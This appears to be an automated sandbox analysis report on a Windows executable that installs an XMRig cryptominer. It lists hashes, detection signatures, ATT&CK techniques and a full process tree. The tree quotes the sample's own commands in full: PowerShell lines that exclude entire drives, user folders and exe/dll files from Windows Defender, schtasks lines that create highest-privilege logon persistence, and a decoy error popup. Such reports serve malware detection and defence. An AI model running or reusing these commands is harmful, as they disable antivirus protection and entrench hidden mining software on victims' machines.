xmrig | f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871

Analysis

max time kernel
117s
max time network
112s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2024 12:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
Size

15.4MB
MD5

c2a14e873d47a54010d29d3208050f98
SHA1

115a5076ff926500ae220cf5e3730084f8a5acf5
SHA256

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871
SHA512

a3a6015a5f4971b24ef51ebbd169c36afa16ebcce6ae0cc34493ad7a9cf01478728a839198fa9b364aed2ae5cb061bff013d02cb48372aed2669c8067bdb3fd3
SSDEEP

393216:kiFsmlTVA8M17MtdipJPVRHy5CKNidWk6KODEfQ:kiHjjJtspN686TuQ

Score

10^/10

xmrig agilenet discovery evasion execution miner themida trojan vmprotect

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

launcher.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ launcher.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	launcher.exe

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1080-221-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-223-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-226-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-227-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-230-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-229-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-228-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-231-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-257-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-258-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/1080-265-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2116	powershell.exe
3252	powershell.exe
4272	powershell.exe
2296	powershell.exe
1892	powershell.exe
5008	powershell.exe
4052	powershell.exe
3836	powershell.exe
2608	powershell.exe
2908	powershell.exe
4776	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

launcher.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	launcher.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	launcher.exe

Drops startup file 1 IoCs

Processes:

RuntimeBroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk RuntimeBroker.exe
Executes dropped EXE 8 IoCs

Processes:

RuntimeBroker.exeJava.exelauncher.exeConsole.exeservices32.exeservices64.exesihost32.exesihost64.exe

pid process

2740 RuntimeBroker.exe
4800 Java.exe
624 launcher.exe
1768 Console.exe
4888 services32.exe
2024 services64.exe
1272 sihost32.exe
5064 sihost64.exe
Loads dropped DLL 1 IoCs

Processes:

launcher.exe

pid process

624 launcher.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updater.lnk	RuntimeBroker.exe

pid	process
2740	RuntimeBroker.exe
4800	Java.exe
624	launcher.exe
1768	Console.exe
4888	services32.exe
2024	services64.exe
1272	sihost32.exe
5064	sihost64.exe

pid	process
624	launcher.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\launcher.exe	agile_net
behavioral2/memory/624-26-0x000001BF98930000-0x000001BF98F4A000-memory.dmp	agile_net

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\84d8043e-3701-4cd3-aaf7-74eac22b6538\AgileDotNetRT64.dll	themida
behavioral2/memory/624-33-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp	themida
behavioral2/memory/624-34-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp	themida
behavioral2/memory/624-110-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp	themida
behavioral2/memory/624-142-0x00007FFB17FD0000-0x00007FFB1883C000-memory.dmp	themida

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/1708-7-0x0000000000400000-0x0000000002107000-memory.dmp	vmprotect
behavioral2/memory/1708-10-0x0000000000400000-0x0000000002107000-memory.dmp	vmprotect
behavioral2/memory/1708-2-0x0000000000400000-0x0000000002107000-memory.dmp	vmprotect
behavioral2/memory/1708-113-0x0000000000400000-0x0000000002107000-memory.dmp	vmprotect

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

launcher.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA launcher.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	launcher.exe

Drops file in System32 directory 7 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File created	C:\Windows\system32\services32.exe	conhost.exe
File opened for modification	C:\Windows\system32\services32.exe	conhost.exe
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

launcher.exe

pid process

624 launcher.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 4764 set thread context of 1080 4764 conhost.exe conhost.exe
Drops file in Windows directory 1 IoCs

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe

description ioc process

File created C:\Windows\RuntimeBroker.exe f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe

pid	process
624	launcher.exe

description	pid	process	target process
PID 4764 set thread context of 1080	4764	conhost.exe	conhost.exe

description	ioc	process
File created	C:\Windows\RuntimeBroker.exe	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.execmd.execmd.execmd.exepowershell.execmd.execmd.execmd.exepowershell.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

2292 schtasks.exe
3588 schtasks.exe

pid	process
2292	schtasks.exe
3588	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exe

pid	process
1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
3252	powershell.exe
4776	powershell.exe
4776	powershell.exe
3252	powershell.exe
4272	powershell.exe
4272	powershell.exe
3452	conhost.exe
3128	conhost.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
3836	powershell.exe
3836	powershell.exe
3836	powershell.exe
2296	powershell.exe
2608	powershell.exe
2296	powershell.exe
2608	powershell.exe
4640	conhost.exe
4640	conhost.exe
4764	conhost.exe
4764	conhost.exe
2908	powershell.exe
1892	powershell.exe
2908	powershell.exe
1892	powershell.exe
1080	conhost.exe
1080	conhost.exe
5008	powershell.exe
5008	powershell.exe
2116	powershell.exe
2116	powershell.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe
1080	conhost.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

RuntimeBroker.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exe

description	pid	process
Token: 35	2740	RuntimeBroker.exe
Token: SeDebugPrivilege	3252	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeDebugPrivilege	3452	conhost.exe
Token: SeDebugPrivilege	3128	conhost.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	4640	conhost.exe
Token: SeDebugPrivilege	4764	conhost.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeLockMemoryPrivilege	1080	conhost.exe
Token: SeLockMemoryPrivilege	1080	conhost.exe
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.execmd.execmd.execmd.execmd.execmd.execmd.exeJava.exeConsole.execonhost.execmd.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1708 wrote to memory of 5080	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 5080	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 5080	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 2996	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 2996	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 2996	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 2900	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 2900	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 2900	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 4264	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 4264	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 4264	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 3440	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 3440	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 3440	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 3696	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 3696	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 1708 wrote to memory of 3696	1708	f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe	cmd.exe
PID 4264 wrote to memory of 2740	4264	cmd.exe	RuntimeBroker.exe
PID 4264 wrote to memory of 2740	4264	cmd.exe	RuntimeBroker.exe
PID 2996 wrote to memory of 3252	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 3252	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 3252	2996	cmd.exe	powershell.exe
PID 5080 wrote to memory of 4776	5080	cmd.exe	powershell.exe
PID 5080 wrote to memory of 4776	5080	cmd.exe	powershell.exe
PID 5080 wrote to memory of 4776	5080	cmd.exe	powershell.exe
PID 2900 wrote to memory of 4800	2900	cmd.exe	Java.exe
PID 2900 wrote to memory of 4800	2900	cmd.exe	Java.exe
PID 3440 wrote to memory of 624	3440	cmd.exe	launcher.exe
PID 3440 wrote to memory of 624	3440	cmd.exe	launcher.exe
PID 3696 wrote to memory of 1768	3696	cmd.exe	Console.exe
PID 3696 wrote to memory of 1768	3696	cmd.exe	Console.exe
PID 2996 wrote to memory of 4272	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 4272	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 4272	2996	cmd.exe	powershell.exe
PID 4800 wrote to memory of 3452	4800	Java.exe	conhost.exe
PID 4800 wrote to memory of 3452	4800	Java.exe	conhost.exe
PID 4800 wrote to memory of 3452	4800	Java.exe	conhost.exe
PID 1768 wrote to memory of 3128	1768	Console.exe	conhost.exe
PID 1768 wrote to memory of 3128	1768	Console.exe	conhost.exe
PID 1768 wrote to memory of 3128	1768	Console.exe	conhost.exe
PID 3452 wrote to memory of 3760	3452	conhost.exe	cmd.exe
PID 3452 wrote to memory of 3760	3452	conhost.exe	cmd.exe
PID 3760 wrote to memory of 4052	3760	cmd.exe	powershell.exe
PID 3760 wrote to memory of 4052	3760	cmd.exe	powershell.exe
PID 3128 wrote to memory of 1416	3128	conhost.exe	cmd.exe
PID 3128 wrote to memory of 1416	3128	conhost.exe	cmd.exe
PID 3452 wrote to memory of 3640	3452	conhost.exe	cmd.exe
PID 3452 wrote to memory of 3640	3452	conhost.exe	cmd.exe
PID 1416 wrote to memory of 3836	1416	cmd.exe	powershell.exe
PID 1416 wrote to memory of 3836	1416	cmd.exe	powershell.exe
PID 3640 wrote to memory of 2292	3640	cmd.exe	schtasks.exe
PID 3640 wrote to memory of 2292	3640	cmd.exe	schtasks.exe
PID 3128 wrote to memory of 4088	3128	conhost.exe	cmd.exe
PID 3128 wrote to memory of 4088	3128	conhost.exe	cmd.exe
PID 4088 wrote to memory of 3588	4088	cmd.exe	schtasks.exe
PID 4088 wrote to memory of 3588	4088	cmd.exe	schtasks.exe
PID 3760 wrote to memory of 2296	3760	cmd.exe	powershell.exe
PID 3760 wrote to memory of 2296	3760	cmd.exe	powershell.exe
PID 1416 wrote to memory of 2608	1416	cmd.exe	powershell.exe
PID 1416 wrote to memory of 2608	1416	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2996	3452	conhost.exe	cmd.exe
PID 3452 wrote to memory of 2996	3452	conhost.exe	cmd.exe
PID 2996 wrote to memory of 4888	2996	cmd.exe	services32.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe
"C:\Users\Admin\AppData\Local\Temp\f312a953f5345ae19e3e0ccc6f6d3197ed13e387fedb7a2e0399b431319c4871.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('The operating system is not supported by this application','Error','OK','Error')"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('The operating system is not supported by this application','Error','OK','Error')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2996
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3252
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\Java.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Users\Admin\AppData\Local\Temp\Java.exe
    C:\Users\Admin\AppData\Local\Temp\Java.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4800
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Java.exe"
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3452
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3760
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4052
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
    - - C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3640
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2292
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services32.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2996
      - C:\Windows\system32\services32.exe
        
        C:\Windows\system32\services32.exe
        6⤵
        Executes dropped EXE
        
        PID:4888
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
        7⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4640
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        8⤵
        
        PID:4348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
        
        C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
        
        "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
        8⤵
        Executes dropped EXE
        
        PID:1272
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost32"
        9⤵
        
        PID:3080
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Windows\RuntimeBroker.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4264
- - C:\Windows\RuntimeBroker.exe
    C:\Windows\RuntimeBroker.exe
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\launcher.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3440
- - C:\Users\Admin\AppData\Local\Temp\launcher.exe
    C:\Users\Admin\AppData\Local\Temp\launcher.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\Console.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3696
- - C:\Users\Admin\AppData\Local\Temp\Console.exe
    C:\Users\Admin\AppData\Local\Temp\Console.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Console.exe"
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3128
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1416
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3836
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
    - - C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4088
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3588
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        5⤵
        
        PID:2284
      - C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        6⤵
        Executes dropped EXE
        
        PID:2024
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        7⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        8⤵
        
        PID:4936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
